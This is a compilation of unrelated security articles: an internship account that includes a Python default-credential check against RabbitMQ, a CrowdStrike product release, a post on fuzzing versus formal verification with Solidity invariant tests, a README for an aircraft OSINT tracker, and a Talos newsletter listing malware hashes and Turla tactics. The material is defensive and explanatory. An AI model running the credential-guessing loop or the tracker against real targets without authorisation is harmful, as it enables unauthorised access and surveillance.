The challenges mostly covered web applications in several different languages, each with different bugs to spot, alongside mobile challenges involving state-of-the-art technologies. I had 2 hours to complete as many challenges as I could from a pool of 8. The time constraint felt right to me: around 15 minutes per challenge is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit to find as many bugs as possible and move on to the next steps of the interview process. It was later explained to me that reviewing numerous (but short) code snippets in a limited time frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities to how to patch vulnerable code. It was a 360-degree interview, and it also included some live code review. The interview lasted an hour or so, and at the end Luca said that he would evaluate my performance and let me know. The day after, another email arrived: I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted an hour. At this point, I had completed the whole process and only needed to wait for their response, which didn’t take long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also hold meetings during the day to synchronize on anything that comes up during the penetration test. Communication is a key part of Doyensec, and from great communication come great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open-source project: writing plugins for Tsunami, Google’s web security scanner. Tsunami is a general-purpose network security scanner with an extensible plugin system for detecting high-severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it that can be used to confirm its existence when scanning. I was assigned to write two plugins that detect weak credentials on the RabbitMQ Management Portal and RStudio Server. The plugins are written in Java, and since I’d done a bit of Java programming during my Bachelor’s degree program, I felt quite confident about it.
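The core of such a weak-credential check is simple to sketch. The snippet below is illustrative Python, not the actual Java plugin: the `/api/whoami` endpoint, port 15672, and the default `guest`/`guest` pair match RabbitMQ’s documented management API defaults, while the host and the extra credential pairs are assumptions for illustration.

```python
# Hedged sketch of a weak-credential check against the RabbitMQ management
# API (the real Tsunami plugin is written in Java and structured differently).
import base64
import urllib.request
import urllib.error

# Candidate pairs: "guest"/"guest" is RabbitMQ's default; the rest are guesses.
DEFAULT_CREDS = [("guest", "guest"), ("admin", "admin"), ("rabbitmq", "rabbitmq")]

def basic_auth_header(user: str, password: str) -> str:
    """Build the HTTP Basic Authorization header value."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"

def check_rabbitmq(host: str, creds=DEFAULT_CREDS, timeout: float = 5.0):
    """Return the first (user, password) pair accepted by /api/whoami, or None."""
    for user, password in creds:
        req = urllib.request.Request(
            f"http://{host}:15672/api/whoami",
            headers={"Authorization": basic_auth_header(user, password)},
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:  # authenticated: weak credentials found
                    return (user, password)
        except urllib.error.URLError:
            continue  # 401 or connection failure: try the next pair
    return None
```

A real plugin would additionally report the finding in Tsunami’s detection format and back it with unit tests and a vulnerable testbed, as described above.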

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibility along with a great sense of freedom at Doyensec. I would add just one thing, about time management, which is one of the most difficult things for me. In a remote company you don’t have time clocks or the like, so you can choose to work the way you prefer. Luca told me several times that at Doyensec it is the output that is evaluated. This was a big adjustment for me, since I was used to working a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which for me is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

Gift from the retreat

In the end, you should consider applying for the next call for interns, if you:

  • are passionate about application security
  • already have good web security skills
  • have organizational capabilities
  • want scheduling flexibility
  • can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

CrowdStrike Enhances Cloud Detection and Response (CDR) Capabilities to Protect CI/CD Pipeline

The increase in cloud adoption has been met with a corresponding rise in cybersecurity threats. Cloud intrusions escalated by a staggering 75% in 2023, with cloud-conscious cases increasing by 110%. Amid this surge, eCrime adversaries have become the top threat actors targeting the cloud, accounting for 84% of adversary-attributed cloud-conscious intrusions. 

For large enterprises that want to maintain the agility of the cloud, it’s often difficult to ensure DevOps teams consistently scan images for vulnerabilities before deployment. Unscanned images could potentially leave critical applications exposed to a breach. This gap in security oversight requires a solution capable of assessing containers already deployed, particularly those with unscanned images or without access to the registry information. 

Recognizing this need, cloud security leader CrowdStrike has enhanced its CrowdStrike Falcon® Cloud Security capabilities to ensure organizations can protect their cloud workloads throughout the entire software development lifecycle and effectively combat adversaries targeting the cloud. Today we’re releasing two new features to help security and DevOps teams secure everything they build in the cloud.

Assess Images for Risks Before Deployment

We have released Falcon Cloud Security Image Assessment at Runtime (IAR) along with additional policy and registry customization tools. 

While pre-deployment image scanning is essential, organizations that only focus on this aspect of application development may create a security gap for containers that are deployed without prior scanning or lack registry information. These security gaps are not uncommon and could be exploited if left unaddressed.

IAR will address this issue by offering: 

  • Continuous security posture: By assessing images at runtime, organizations can maintain a continuous security posture throughout the software development lifecycle, identifying and mitigating threats in real time even after containers are deployed.
  • Runtime vulnerability and malware detection: IAR identifies vulnerabilities, malware and secrets, providing a holistic view of the security health of containers. This will help organizations take preventative actions on potential threats to their containers. 
  • Comprehensive coverage: If containers are launched with unscanned images, or if the registry information is unavailable, IAR provides the flexibility to fully secure containers by ensuring that none go unchecked. This enhancement widens the coverage for DevOps teams utilizing image registries, extending CrowdStrike’s robust pre-runtime security capabilities beyond the already supported 16 public registries — the most of any vendor in the market. 

Figure 1. Kubernetes and Containers Inventory Dashboard in the Falcon Cloud Security console (click to enlarge)


IAR is developed for organizations with specific data privacy constraints — for example, those with strict regulations around sharing customer data. Recognizing these challenges, IAR provides a local assessment that enables customers to conduct comprehensive image scans within their own environments. This addresses the critical need for privacy and efficiency by allowing organizations to bypass the limitations of cloud-based scanning solutions, which are unable to conduct scans at the local level.

Further, IAR helps boost operational efficiency at times when customers don’t want to modify or update their CI/CD pipelines to accommodate image assessment capabilities. Its runtime vulnerability scanning enhances container security and eliminates the need for direct integration with an organization’s CI/CD pipeline. This ensures organizations can perform immediate vulnerability assessments as containers start up, examining not only operating system flaws but also package and application-level vulnerabilities. This real-time scanning also enables the creation of an up-to-date software bill of materials (SBOM), a comprehensive inventory of all components along with their security posture. 

A Better Approach to Preventing Non-Compliant Containers and Images

Teams rely on the configuration of access controls within registries to effectively manage permissions for cloud resources. Without proper registry filtering, organizations cannot control who has access to specific data or services within their cloud infrastructure. 

Additionally, developer and security teams often lack the flexibility and visibility to understand where and how to find container images that fall out of security compliance when they have specific requirements like temporary exclusions. These problems can stem from using disparate tools and/or lacking customized rule-making and filtering within their cloud security tools. Security teams then must also be able to relay the relevant remediation steps to developer owners to quickly update the image. These security gaps, if left unchecked, can lead to increased risk and slow down DevSecOps productivity.

Figure 2. Image Assessment policy exclusions in the Falcon Cloud Security console (click to enlarge)


To that end, we are also announcing new image assessment policies and registry filters to improve the user experience, accelerate team efficiency and stop breaches. 

These enhancements will address issues by offering:

  • Greater control: Enhanced policy exclusion writing tools offer greater control over security policies, allowing organizations to more easily manage access, data and services within their cloud infrastructure while giving the owners of containers and assets the visibility to address areas most critical to them so they can focus on what matters.
  • Faster remediation for developers: Using enhanced image assessment policies, developers will be able to more quickly understand why a policy has failed a container image and be able to rapidly address issues before they can pose a greater security risk. 
  • Image integrity: By creating new policies and rules, security administrators can ensure only secure images are built or deployed.
  • Scalability: As businesses grow and evolve, so do their security needs. CrowdStrike’s customizable cloud policies are designed to scale seamlessly, ensuring security measures remain effective and relevant regardless of organizational size or complexity.

These enhancements are designed to improve container image security, reduce the risks associated with non-compliance, and improve the collaboration and responsiveness of security and developer teams. These changes continue to build on the rapid innovations across Falcon Cloud Security to stop breaches in the cloud.  

Delivered from the AI-native CrowdStrike Falcon Platform

The release of IAR and new policy enhancements are more than just incremental updates — they represent a shift in container security. By integrating security measures throughout the entire lifecycle of a container, from its initial deployment to its active phase in cloud environments, CrowdStrike is not just responding to the needs of the modern DevSecOps landscape but anticipating them, offering a robust, efficient and seamless solution for today’s security challenges. 

Unlike other vendors that may offer disjointed security components, CrowdStrike’s approach integrates elements across the entire cloud infrastructure. From hybrid to multi-cloud environments, everything is managed through a single, intuitive console within the AI-native CrowdStrike Falcon® platform. This unified cloud-native application protection platform (CNAPP) ensures organizations achieve the highest standards of security, effectively shielding against breaches with an industry-leading cloud security solution. The IAR feature, while pivotal, is just one component of this comprehensive CNAPP approach, underscoring CrowdStrike’s commitment to delivering unparalleled security solutions that meet and anticipate the adversaries’ attacks on cloud environments.

Get a free Cloud Security Risk Review and see Falcon Cloud Security in action for yourself.  

During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats. 

Additional Resources

Why fuzzing over formal verification?

By Tarun Bansal, Gustavo Grieco, and Josselin Feist

We recently introduced our new offering, invariant development as a service. A recurring question that we are asked is, “Why fuzzing instead of formal verification?” And the answer is, “It’s complicated.”

We use fuzzing for most of our audits but have used formal verification methods in the past. In particular, we found symbolic execution useful in audits such as Sai, Computable, and Balancer. However, we realized through experience that fuzzing tools produce similar results but require significantly less skill and time.

In this blog post, we will examine why the two principal assertions in favor of formal verification often fall short: proving the absence of bugs is typically unattainable, and fuzzing can identify the same bugs that formal verification uncovers.

Proving the absence of bugs

One of the key selling points of formal verification over fuzzing is its ability to prove the absence of bugs. To do that, formal verification tools use mathematical representations to check whether a given invariant holds for all input values and states of the system.
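As a toy illustration of that "for all inputs" guarantee versus sampling, consider a tiny input space where exhaustive checking stands in for a proof and random sampling stands in for fuzzing. This is purely illustrative; real provers reason symbolically rather than enumerating inputs.

```python
# Toy contrast (not a real prover): exhaustive checking over all signed 8-bit
# inputs finds every invariant violation; random sampling may miss the single
# failing input. The bug mirrors the classic abs(INT_MIN) overflow.
import random

def wrap8(x: int) -> int:
    """Simulate signed 8-bit overflow semantics."""
    return ((x + 128) % 256) - 128

def buggy_abs8(x: int) -> int:
    """abs() over int8: overflows for the single input -128."""
    return wrap8(-x) if x < 0 else x

def invariant_holds(x: int) -> bool:
    return buggy_abs8(x) >= 0

# "Proof" by exhaustion over all 256 inputs: guaranteed to find the violation.
violations = [x for x in range(-128, 128) if not invariant_holds(x)]
assert violations == [-128]

# Fuzzing: random sampling may or may not hit the one failing input.
samples = [random.randint(-128, 127) for _ in range(100)]
fuzz_found = any(not invariant_holds(x) for x in samples)
```

On a 256-value domain, enumeration is trivial; the difficulties described below arise because real contracts have state spaces far too large to enumerate, forcing provers into symbolic reasoning with all its practical constraints.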

While such a claim can be attainable on a simple codebase, it’s not always achievable in practice, especially with complex codebases, for the following reasons:

  • The code may need to be rewritten to be amenable to formal verification. This leads to the verification of a pseudo-copy of the target instead of the target itself. For example, the Runtime Verification team verified the pseudocode of the deposit contract for the ETH2.0 upgrade, as mentioned in this excerpt from their blog post:

    Specifically, we first rigorously formalized the incremental Merkle tree algorithm. Then, we extracted a pseudocode implementation of the algorithm employed in the deposit contract, and formally proved the correctness of the pseudocode implementation.

  • Complex code may require a custom summary of some functionality to be analyzed. In these situations, the verification relies on the custom summary to be correct, which shifts the responsibility of correctness to that summary. To build such a summary, users might need to use an additional custom language, such as CVL, which increases the complexity.
  • Loops and recursion may require adding manual constraints (e.g., unrolling the loop for only a given amount of time) to help the prover. For example, the Certora prover might unroll some loops for a fixed number of iterations and report any additional iteration as a violation, forcing further involvement from the user.
  • The solver can time out. If the tool relies on a solver for equations, finding a solution in a reasonable time may not be possible. In particular, proving code with a high number of nonlinear arithmetic operations or updates to storage or memory is challenging. If the solver times out, no guarantee can be provided.

So while proving the absence of bugs is a benefit of formal verification methods in theory, it may not be the case in practice.

Finding bugs

When formally verifying the code is not possible, formal verification tools can still be used as bug finding tools. However, the question remains, “Can formal verification find real bugs that cannot be found by a fuzzer?” At this point, wouldn’t it just be easier to use a fuzzer?

To answer this question, we looked at two bugs found using formal verification in MakerDAO and Compound and then attempted to find these same bugs with only a fuzzer. Spoiler alert: we succeeded.

We selected these two bugs because they were widely advertised as having been discovered through formal verification, and they affected two popular protocols. To our surprise, it was difficult to find public issues discovered solely through formal verification, in contrast with the many bugs found by fuzzing (see our security reviews).

Our fuzzer found both bugs in a matter of minutes, running on a typical development laptop. The bugs we evaluated, as well as the formal verification and fuzz testing harnesses we used to discover them, are available on our GitHub page about fuzzing formally verified contracts to reproduce popular security issues.

Fundamental invariant of DAI

MakerDAO found a bug in its live code after four years. You can read more about the bug in When Invariants Aren’t: DAI’s Certora Surprise. Using the Certora prover, MakerDAO found that the fundamental invariant of DAI, which is that the sum of all collateral-backed debt and unbacked debt should equal the sum of all DAI balances, could be violated in a specific case. The core issue is that calling the init function when a vault’s rate state variable is zero and its Art state variable is nonzero changes the vault’s total debt, which violates the invariant relating the sum of total debt to the total DAI supply. The MakerDAO team concluded that calling the init function after calling the fold function is a path to break the invariant.

function sumOfDebt() public view returns (uint256) {
    uint256 length = ilkIds.length;
    uint256 sum = 0;
    for (uint256 i=0; i < length; ++i){
        sum = sum + ilks[ilkIds[i]].Art * ilks[ilkIds[i]].rate;
    }
    return sum;
}

function echidna_fund_eq() public view returns (bool) {
    return debt == vice + sumOfDebt();
}

Figure 1: Fundamental equation of DAI invariant in Solidity

We implemented the same invariant in Solidity, as shown in figure 1, and checked it with Echidna. To our surprise, Echidna violated the invariant and found a unique path to trigger the violation. Our implementation is available in the Testvat.sol file of the repository. Implementing the invariant was easy because the source code under test was small and required only logic to compute the sum of all debts. Echidna took less than a minute on an i5 Linux machine with 12 GB of RAM to violate the invariant.

Liquidation of collateralized account in Compound V3 Comet

The Certora team used their Certora Prover to identify an interesting issue in the Compound V3 Comet smart contracts that allowed a fully collateralized account to be liquidated. The root cause of this issue was using an 8-bit mask for a 16-bit vector. The mask remains zero for the higher bits in the vector, which skips assets while calculating total collateral and results in the liquidation of the collateralized account. More on this issue can be found in the Formal Verification Report of Compound V3 (Comet).
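The root cause is easy to reproduce outside Solidity. The sketch below is an illustrative Python model, not Comet’s actual code: an account’s asset flags live in a 16-bit vector, and building the mask from only 8 bits silently zeroes the flags for slots 8 through 15, so collateral held there is ignored.

```python
# Illustrative model of the Comet mask bug: summing collateral over a 16-bit
# "assets in" flag vector with a mask built from too few bits drops the high
# asset slots entirely.
def total_collateral(assets_in: int, balances: list, mask_bits: int) -> int:
    """Sum balances of assets whose flag bit survives the mask."""
    mask = (1 << mask_bits) - 1          # 8 bits -> 0xFF, 16 bits -> 0xFFFF
    flags = assets_in & mask
    return sum(bal for i, bal in enumerate(balances) if flags & (1 << i))

balances = [0] * 16
balances[10] = 500                        # collateral held in asset slot 10
assets_in = 1 << 10                       # flag bit for slot 10 is set

correct = total_collateral(assets_in, balances, 16)   # 500: slot 10 counted
buggy = total_collateral(assets_in, balances, 8)      # 0: slot 10 masked out
```

With the 8-bit mask, an account whose only collateral sits in a high slot appears to have zero collateral, which is exactly the condition that allowed a fully collateralized account to be liquidated.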

function echidna_used_collateral() public view returns (bool) {
    for (uint8 i = 0; i < assets.length; ++i) {
        address asset = assets[i].asset;
        uint256 userColl = sumUserCollateral(asset, true);
        uint256 totalColl = comet.getTotalCollateral(asset);
        if (userColl != totalColl) {
            return false;
        }
    }
    return true;
}

function echidna_total_collateral_per_asset() public view returns (bool) {
    for (uint8 i = 0; i < assets.length; ++i) {
        address asset = assets[i].asset;
        uint256 userColl = sumUserCollateral(asset, false);
        uint256 totalColl = comet.getTotalCollateral(asset);
        if (userColl != totalColl) {
            return false;
        }
    }
    return true;
}

Figure 2: Compound V3 Comet invariant in Solidity

Echidna discovered the issue with the implementation of the invariant in Solidity, as shown in figure 2. This implementation is available in the TestComet.sol file in the repository. Implementing the invariant was easy; it required limiting the number of users interacting with the test contract and adding a method to calculate the sum of all user collateral. Echidna broke the invariant within minutes by generating random transaction sequences to deposit collateral and checking invariants.

Is formal verification doomed?

Formal verification tools require a lot of domain-specific knowledge to use effectively and significant engineering effort to apply. Grigore Rosu, Runtime Verification’s CEO, summarized it as follows:

Figure 3: A tweet from the founder of Runtime Verification Inc.

While formal verification tools are constantly improving, which reduces the engineering effort, none of the existing tools reach the ease of use of existing fuzzers. For example, the Certora Prover makes formal verification more accessible than ever, but it is still far less user-friendly than a fuzzer for complex codebases. With the rapid development of these tools, we hope for a future where formal verification tools become as accessible as other dynamic analysis tools.

So does that mean we should never use formal verification? Absolutely not. In some cases, formally verifying a contract can provide additional confidence, but these situations are rare and context-specific.

Consider formal verification for your code only if the following are true:

  • You are following an invariant-driven development approach.
  • You have already tested many invariants with fuzzing.
  • You have a good understanding of which remaining invariants and components would benefit from formal methods.
  • You have solved all the other issues that would decrease your code maturity.

Writing good invariants is the key

Over the years, we have observed that the quality of invariants is paramount. Writing good invariants is 80% of the work; the tool used to check/verify them is important but secondary. Therefore, we recommend starting with the easiest and most effective technique—fuzzing—and relying on formal verification methods only when appropriate.

If you’re eager to refine your approach to invariants and integrate them into your development process, contact us to leverage our expertise.

Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, information gathering and OSINT are a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack requires Python 3.

Preview

Features

skytrack features three main functions for aircraft information gathering and display. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information as a PDF. The PDF presents all the aircraft data in a visual layout for later reference and is named "skytrack_report.pdf".

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: the Tail Number and the ICAO address. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO address (ICAO24) is a fixed-length, six-character hexadecimal ID. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting from one format to the other can be rather cumbersome, as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)
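The sketch below illustrates only the offset arithmetic behind this mapping, using the three sample pairs above. The base address 0xA00001 follows from the a00001/N1 pair; the sample index table is a stand-in, since a real converter must reproduce the FAA’s full sequential allocation order, which is considerably more involved.

```python
# Hedged sketch of the tail-number/ICAO mapping idea: US ICAO addresses are
# allocated sequentially against the ordered list of N-Numbers, starting at
# 0xA00001 for N1. Only the three documented sample pairs are modeled here.
US_ICAO_BASE = 0xA00001  # ICAO address assigned to N1

# Position of each sample tail number in the allocation order (illustrative).
SAMPLE_ORDER = {"N1": 0, "N1A": 1, "N1AA": 2}

def tail_to_icao(tail: str) -> str:
    """Convert a sampled US tail number to its six-hex-digit ICAO address."""
    return format(US_ICAO_BASE + SAMPLE_ORDER[tail], "06x")

def icao_to_tail(icao: str) -> str:
    """Reverse lookup over the same sample table."""
    index = int(icao, 16) - US_ICAO_BASE
    return {v: k for k, v in SAMPLE_ORDER.items()}[index]
```

For example, `tail_to_icao("N1AA")` yields `"a00003"`, matching the table above; the full converter in skytrack generalizes this to the entire US registry.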

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



“Pig butchering” is an evolution of a social engineering tactic we’ve seen for years


Whether you want to call them “catfishing,” “pig butchering” or just good old-fashioned “social engineering,” romance scams have been around forever.  

I was first introduced to them through the MTV show “Catfish,” but recently they seem to be making headlines as the term “pig butchering” enters the public lexicon. John Oliver recently covered it on “Last Week Tonight,” which means everyone my age with an HBO account heard about it a few weeks ago. And one of my favorite podcasts going, “Search Engine,” just covered it in an episode.

The concept of “pig butchering” scams generally follows the same chain of events: 

  • An unknown phone number texts or messages a target with a generally harmless message, usually asking for a random name disguised as an “Oops, wrong number!” text. 
  • When the target responds, the actor tries to strike up a conversation with a friendly demeanor. 
  • If the conversation persists, they usually evolve into “love bombing,” including compliments, friendly advice, ego-boosting, and saying flattering things about any photos the target has sent. 
  • Sometimes, the relationship may turn romantic. 
  • The scammer eventually “butchers” the “pig” that has been “fattened up” to that point, scamming them into handing over money, usually in the form of a phony cryptocurrency app, or just straight up asking for the target to send the scammer money somehow. 

There are a few twists and turns along the way based on the exact scammer, but that’s generally how it works. What I think is important to remember is that this specific method of separating users from their money is not actually new.  

The FBI seems to release a renewed warning about romance scams every Valentine’s Day when people are more likely to fall for a stranger online wanting to make a real connection and then eventually asking for money. I even found a podcast from the FBI in 2015 in which they warned that scammers “promise love, romance, to entice their victims online,” estimating that romance-related scams cost consumers $82 million in the last half of 2014.  

The main difference that I can tell between “pig butchering” and past romance scams is the sheer scale. Many actors running these operations are relying on human trafficking and sometimes literal imprisonment, forcing these people against their will to send these mass blocks of messages to a variety of targets indiscriminately. Oftentimes in these groups, scammers who are less “successful” in luring victims can be verbally and physically harassed and punished. That is, of course, a horrible human toll that these operations are taking, but they also extend far beyond the world of cybersecurity. 

In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package. Instead, it relies on user education and on law enforcement agencies and international governments ensuring these farms can’t operate in the shadows and that the founders who run them are brought to justice. 

It’s never a bad thing that users become more educated on these scams because of this coverage, but I also feel it’s important to remember that romance-related scams, and really any social engineering built on a personal “relationship,” have been around for years, and “pig butchering” is not something new that just started popping up. 

These types of scams are ones that our culture has kind of just accepted as part of daily life at this point (who doesn’t get surprised when they get a call about their “car’s extended warranty”?), and now the infrastructure to support these scams is taking a larger human toll than ever. 

The one big thing 

Talos has yet another round of research into the Turla APT, and now we’re able to see the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclusions have been set up, TinyTurla-NG is written to disk, and persistence is established by creating a malicious service. 

Why do I care? 

Turla, along with the recently discovered TinyTurla-NG tool that Talos has been writing about, is an international threat that’s been around for years, so it’s always important for the entire security community to know what they’re up to. Most recently, Turla used these tactics to target Polish non-governmental organizations (NGOs) and steal sensitive data.  

So now what? 

During Talos’ research into TinyTurla-NG, we’ve released several new rounds of detection content for Cisco Secure products. Read our past two blog posts on this actor for more.  

Top security headlines of the week 

The Biden administration issued a renewed warning to public water systems and operators this week, saying state-sponsored actors could carry out cyber attacks soon, citing ongoing threats from Iran and China. The White House and U.S. Environmental Protection Agency sent a letter to every U.S. governor this week warning them that cyber attacks could disrupt access to clean drinking water and “impose significant costs on affected communities.” The letter also points to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities catalog, asking the managers of public water systems to ensure their systems are patched against these vulnerabilities. The EPA pointed to Volt Typhoon, a recently discovered Chinese APT that has reportedly been hiding on critical infrastructure networks for an extended period. A meeting among federal government leaders from the EPA and other related agencies is scheduled for March 21 to discuss threats to public water systems and how they can strengthen their cybersecurity posture. (Bloomberg, The Verge) 

UnitedHealth says it’s still recovering from a cyber attack that halted crucial payments to health care providers across the U.S., but it started releasing some of those funds this week and expects its payment processing software to be back online soon. The cyber attack, first disclosed in February, targeted Change Healthcare, a subsidiary of UnitedHealth that handles payment processing and pharmaceutical orders for hospital chains and doctors’ offices. UnitedHealth’s CEO said in a statement this week that the company has paid $2 billion to affected providers, who spent nearly a month unable to obtain those funds or forced to switch to a paper billing system. A recently published survey from the American Hospital Association found that 94 percent of hospitals that responded experienced financial disruptions from the Change Healthcare attack, with losses at one point hitting $1 million in revenue per day. (ABC News, CNBC) 

Nevada’s state court system is currently weighing a case that could undo end-to-end encryption across the U.S. The state’s attorney general is suing Meta, the creator of Facebook, Instagram and WhatsApp, asking the company to remove end-to-end encryption for minors on its platforms, with the promise of being able to catch and charge users who abuse the platforms to lure minors. However, privacy advocates are concerned that any ruling against Meta and its encryption policies could have larger ripple effects and embolden others to challenge encryption in other states. Nevada argues that Meta’s Messenger is a “preferred method” for individuals targeting Nevada children for illicit activities. Privacy experts favor end-to-end encryption because it safeguards messages during transmission and makes it more difficult for other parties, including law enforcement agencies, to intercept and read them. (Tech Policy Press, Bloomberg Law) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 


Botconf (April 23 - 26) 

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework, which threat actors are using at scale to create botnets with Supershell implants.

CARO Workshop 2024 (May 1 - 3) 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent States (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns, detailing the commodity and custom-built malware employed by the actor and the discovery and evolution of their tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9) 

San Francisco, California    

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5 
MD5: ff1b6bb151cf9f671c929a4cbdb64d86 
Typical Filename: endpoint.query 
Claimed Product: Endpoint-Collector 
Detection Name: W32.File.MalParent 

SHA 256: e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3 
MD5: c16df0bfc6fda86dbfa8948a566d32c1 
Typical Filename: CEPlus.docm 
Claimed Product: N/A  
Detection Name: Doc.Downloader.Pwshell::mash.sr.sbx.vioc 

CISSP is changing! Common body of knowledge changes for 2024 | Cyber Work Hacks

Cyber Work Hacks is back to keep you updated on the CISSP exam! Infosec boot camp instructor Steve Spearman joins me to explain the new changes to the CISSP’s common body of knowledge (CBK) and how those changes should (or shouldn’t!) affect your study and preparation for the exam. Keep learning, and keep it here for another Cyber Work Hack.

– Learn more about the CISSP: https://www.infosecinstitute.com/training/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/
 
0:00 - CISSP exam common body of knowledge 
1:16  - Changes to CISSP's CBK
7:45 - Why did CISSP make CBK changes?
9:17 - How to study for the CISSP
11:37 - Most important CISSP exam items 
14:04 - Best advice for taking the CISSP exam
15:03 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


